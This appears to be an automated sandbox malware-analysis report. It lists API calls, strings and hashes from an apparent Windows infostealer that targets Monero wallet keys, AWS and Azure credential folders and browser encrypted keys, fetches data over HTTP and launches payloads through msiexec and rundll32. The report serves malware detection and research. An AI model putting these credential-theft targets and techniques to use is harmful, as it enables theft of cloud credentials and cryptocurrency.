                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0083E920,00000000,?,00E0144C,00000000,?,?), ref: 00DECA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00DECA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00DECA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DECAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00DECAD9
                          • StrStrA.SHLWAPI(?,0083EAB8,00E00B52), ref: 00DECAF7
                          • StrStrA.SHLWAPI(00000000,0083E9B0), ref: 00DECB1E
                          • StrStrA.SHLWAPI(?,0083F228,00000000,?,00E01458,00000000,?,00000000,00000000,?,00838B98,00000000,?,00E01454,00000000,?), ref: 00DECCA2
                          • StrStrA.SHLWAPI(00000000,0083F2E8), ref: 00DECCB9
                            • Part of subcall function 00DEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00DEC871
                            • Part of subcall function 00DEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00DEC87C
                          • StrStrA.SHLWAPI(?,0083F2E8,00000000,?,00E0145C,00000000,?,00000000,00838B68), ref: 00DECD5A
                          • StrStrA.SHLWAPI(00000000,00838948), ref: 00DECD71
                            • Part of subcall function 00DEC820: lstrcat.KERNEL32(?,00E00B46), ref: 00DEC943
                            • Part of subcall function 00DEC820: lstrcat.KERNEL32(?,00E00B47), ref: 00DEC957
                            • Part of subcall function 00DEC820: lstrcat.KERNEL32(?,00E00B4E), ref: 00DEC978
                          • lstrlen.KERNEL32(00000000), ref: 00DECE44
                          • CloseHandle.KERNEL32(00000000), ref: 00DECE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: 81b67ead00f9fb401bd4fabc4d9fe1c5622cce1512b574c8e35388da92795325
                          • Instruction ID: 845b5696a829c604c025fe2660ba783e01042a4413e738a344975b42b0558feb
                          • Opcode Fuzzy Hash: 81b67ead00f9fb401bd4fabc4d9fe1c5622cce1512b574c8e35388da92795325
                          • Instruction Fuzzy Hash: C5E1F9B190010CABDB14EBA8DC91FEEB778EF14340F518169F20A67195EF746A4ACB71
                          Function 00DF8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • RegOpenKeyExA.ADVAPI32(00000000,0083BD50,00000000,00020019,00000000,00E005B6), ref: 00DF83A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00DF8426
                          • wsprintfA.USER32 ref: 00DF8459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00DF847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF8499
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: cb124e3b98d666f204abdd15ad796c068720da23b2af16610ab868a8127d6637
                          • Instruction ID: 3f089b1bdefd73cc9cad1ba060acf4c3effa55405a80c650d604da3c3ce8108a
                          • Opcode Fuzzy Hash: cb124e3b98d666f204abdd15ad796c068720da23b2af16610ab868a8127d6637
                          • Instruction Fuzzy Hash: 7481E9B191011CAADB24DF54CC95FEAB7B8FF08700F10C299E24AA6180DF756B85CFA5
                          Function 00DF4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF4DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00DF4DCD
                            • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF492C
                            • Part of subcall function 00DF4910: FindFirstFileA.KERNEL32(?,?), ref: 00DF4943
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF4E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00DF4E59
                            • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FDC), ref: 00DF4971
                            • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FE0), ref: 00DF4987
                            • Part of subcall function 00DF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00DF4B7D
                            • Part of subcall function 00DF4910: FindClose.KERNEL32(000000FF), ref: 00DF4B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF4EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00DF4EE5
                            • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF49B0
                            • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E008D2), ref: 00DF49C5
                            • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF49E2
                            • Part of subcall function 00DF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00DF4A1E
                            • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,00840CA0), ref: 00DF4A4A
                            • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,00E00FF8), ref: 00DF4A5C
                            • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,?), ref: 00DF4A70
                            • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,00E00FFC), ref: 00DF4A82
                            • Part of subcall function 00DF4910: lstrcat.KERNEL32(?,?), ref: 00DF4A96
                            • Part of subcall function 00DF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00DF4AAC
                            • Part of subcall function 00DF4910: DeleteFileA.KERNEL32(?), ref: 00DF4B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 696ad13c5f4f70a8994d9841282c9e5fda1a753233d74cd0cf586884dcd64f04
                          • Instruction ID: 963ec1e219aa5541debda5a64e40550526c7b1f208a64da96dc6dd0f0ada36f0
                          • Opcode Fuzzy Hash: 696ad13c5f4f70a8994d9841282c9e5fda1a753233d74cd0cf586884dcd64f04
                          • Instruction Fuzzy Hash: 504132BAA4030866DB64FB60DC47FED7238EB64700F408494B689660C5EEF557C98BB2
                          Function 00DF9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DF906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: b0b3e8d365fa52f9ec40760e34cc584829ac7292f25be43e1c03123d24887c26
                          • Instruction ID: c892d95941ad8e07dc0fd19c187c92a19c8d39e3bb643839c34ab3ca217bf6dd
                          • Opcode Fuzzy Hash: b0b3e8d365fa52f9ec40760e34cc584829ac7292f25be43e1c03123d24887c26
                          • Instruction Fuzzy Hash: 3B71DE75A10208EBDB24EFE4D899FEDB7B8FB48700F108518F655A7284DB79A905CB70
                          Function 00DF2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00DF31C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00DF335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00DF34EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 069a164d0a6710d345fe8d0d65f23e1afbef7a46868d733c3c41ef91f8691741
                          • Instruction ID: 9d19018d75c661d0e814823977b029c6a49a5106de92851e9ceb07bc7b1f90e3
                          • Opcode Fuzzy Hash: 069a164d0a6710d345fe8d0d65f23e1afbef7a46868d733c3c41ef91f8691741
                          • Instruction Fuzzy Hash: BB120AB180011C9ADB14EBA4CC92FFEB738EF14340F558169E60A66195EF746B4ACF72
                          Function 00DF52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE6280: InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
                            • Part of subcall function 00DE6280: StrCmpCA.SHLWAPI(?,00840B30), ref: 00DE6303
                            • Part of subcall function 00DE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
                            • Part of subcall function 00DE6280: HttpOpenRequestA.WININET(00000000,GET,?,00840030,00000000,00000000,00400100,00000000), ref: 00DE6385
                            • Part of subcall function 00DE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
                            • Part of subcall function 00DE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DF5318
                          • lstrlen.KERNEL32(00000000), ref: 00DF532F
                            • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00DF5364
                          • lstrlen.KERNEL32(00000000), ref: 00DF5383
                          • lstrlen.KERNEL32(00000000), ref: 00DF53AE
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 363c562cd34135b0e19b8ab77b2209da1f9de48390edf09dc188a10e72cd4510
                          • Instruction ID: 8ffdb5a78dbfee929f43b01cc50f04d2d44f31df214745ddba1deaad8687c0f7
                          • Opcode Fuzzy Hash: 363c562cd34135b0e19b8ab77b2209da1f9de48390edf09dc188a10e72cd4510
                          • Instruction Fuzzy Hash: 8E513AB091014D9BCB14FF68C992AFD3778EF10340F55C018EA0A6A596EF74AB45CBB2
                          Function 00DF12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 09b3965f0a4e6f45b89cd043381c46824f4adff7c520152d80f91798d25e56b6
                          • Instruction ID: 6533ea7e059e7132971ddaa299784e4dc7cbae82052fc54117b87ac49d06d843
                          • Opcode Fuzzy Hash: 09b3965f0a4e6f45b89cd043381c46824f4adff7c520152d80f91798d25e56b6
                          • Instruction Fuzzy Hash: 9EC172B5A0021DDBCB24EF60DC89FEA7378FF54304F118598E60AA7141DA75AA85CFB1
                          Function 00DF4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF42EC
                          • lstrcat.KERNEL32(?,00840720), ref: 00DF430B
                          • lstrcat.KERNEL32(?,?), ref: 00DF431F
                          • lstrcat.KERNEL32(?,0083EA88), ref: 00DF4333
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DF8D90: GetFileAttributesA.KERNEL32(00000000,?,00DE1B54,?,?,00E0564C,?,?,00E00E1F), ref: 00DF8D9F
                            • Part of subcall function 00DE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00DE9D39
                            • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                            • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                            • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                            • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                            • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                            • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                            • Part of subcall function 00DF93C0: GlobalAlloc.KERNEL32(00000000,00DF43DD,00DF43DD), ref: 00DF93D3
                          • StrStrA.SHLWAPI(?,00840768), ref: 00DF43F3
                          • GlobalFree.KERNEL32(?), ref: 00DF4512
                            • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9AEF
                            • Part of subcall function 00DE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B01
                            • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9B2A
                            • Part of subcall function 00DE9AC0: LocalFree.KERNEL32(?,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF44A3
                          • StrCmpCA.SHLWAPI(?,00E008D1), ref: 00DF44C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00DF44D2
                          • lstrcat.KERNEL32(00000000,?), ref: 00DF44E5
                          • lstrcat.KERNEL32(00000000,00E00FB8), ref: 00DF44F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: c7906df01814cb8162998f9994078c85a877aa59f8b339b754ab25a6d70ae9a1
